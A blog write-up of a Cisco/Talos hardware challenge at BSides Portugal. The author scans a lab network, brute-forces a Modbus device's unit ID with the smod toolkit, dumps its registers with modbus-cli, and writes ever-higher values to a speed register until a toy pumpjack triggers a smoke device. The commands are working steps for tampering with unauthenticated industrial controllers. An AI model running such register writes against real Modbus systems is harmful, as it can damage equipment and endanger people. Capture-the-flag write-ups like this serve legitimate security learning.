DEV Community

JP Dias
JP Dias

Posted on • Originally published at jpdias.me on

Make it smoke! Cisco Challenge Write-up

BSides is the biggest security-wise event in Portugal, with 2 days of talks, workshops, a CTF competition, and lots more. During BSides some sidequests ranging from raffles to challenges appear that can give you prizes_!_ This is a write-up of one of those challenges by Cisco/Talos.

The Challenge

Make it Smoke!

In the booth of Cisco/Talos we were presented with the following scenario (as it can be seen in the picture):

  1. An access point (AP) named security with the password cisco12345.
  2. A 3d-printed pumpjack1.
  3. Some kind of controller based on Arduino.
  4. The objective was to make it smoke somehow.

Preliminaries

First thing first, connect to the network and do a quick network and port scan. Since it was an AP for everyone that wanted to do the challenge, several IP’s showed up, but only one interesting, the 10.10.10.1 with the port 502 open.

As per Siemens documentation: By default, the protocol uses Port 502 as local port in the Modbus server2. Thus we are probably faced with something that speaks Modbus protocol.

With a little of search you can find a lot of Modbus protocol clients in the wild, as well as some offensive toolkits.

Making it smoke!

Using the smod-1 by theralfbrown toolkit I was able to connect to the Modbus system and interact with it.

$ python smod.py
SMOD > use modbus/scanner/uid
SMOD modbus(uid) > set RHOST 10.10.10.1
SMOD modbus(uid) > exploit
[+] Module Brute Force UID Start
[+] Start Brute Force UID on : 10.10.10.1
[+] UID on 10.10.10.1 is : 10
Enter fullscreen mode Exit fullscreen mode

Now I did know the UID of the Modbus, however even after exploring the DoS capabilities and all the reader modules I was not getting anywhere close to make it smoke.

So, after exploring a little more one Github I found out this really nice modbus-cli by tallakt.

Even if it was not implemented with an offensive mindset like the previous tool, it allowed us to read, write and dump the memory of a Modbus device. Using it we were able to read random parts of the memory, as example, reading five words from the device starting from address %MW100 (which corresponds to address 400101).

$ modbus read 10.10.10.1 %MW100 5
%MW100 0
%MW101 0
%MW102 0
%MW103 0
%MW104 0
Enter fullscreen mode Exit fullscreen mode

After trying to read random places of the memory using this tool and finding nothing but zero values, and decided to just dump everything into a file (the operation took around 20 seconds).

$ modbus read --output mybackup.yml 10.10.10.1 400001 1000
Enter fullscreen mode Exit fullscreen mode

After dumping all the memory into a file, looking into the file:

$ cat mybackup.yml 
---
:host: 10.10.10.1
:port: 502
:slave: 1
:offset: '400001'
:data:
- 0
- 0
- 0
- 0
- 0
- 0
- 5000
- 0
-- show more --
Enter fullscreen mode Exit fullscreen mode

The file keep going on, with a lot of zero’s and a lot of random values. I guess that those random value were the result of all the participants trying to pwn it.

However, that seventh value caught my attention because it was a simple number. Maybe that was the speed of the rotation mechanism of the pumpjack, maybe.

Checking if the dump was correct, with the same tool we could read that specific part of the memory:

$ modbus read 10.10.10.1 400001 7
400001 0
400002 0
400003 0
400004 0
400005 0
400006 0
400007 8000
Enter fullscreen mode Exit fullscreen mode

And yep, the value was still there, but a bit higher (and we could observe the pumpjack rotating more quickly).

So the next step was to try to write some higher value there:

$ modbus write 10.10.10.1 400007 10000
Enter fullscreen mode Exit fullscreen mode

And then, higher:

$ modbus write 10.10.10.1 400007 18000
Enter fullscreen mode Exit fullscreen mode

And this was it, the increase in the rotation speed of the pumpjack triggered the smoke device that was connected to the Arduino!

Running like hell!

It was a fun challenge by Cisco and Talos. And pwning IoT devices is the real _sh_t*.

Pumpjack on Wikipedia

Which ports are released for Modbus/TCP communication

Top comments (0)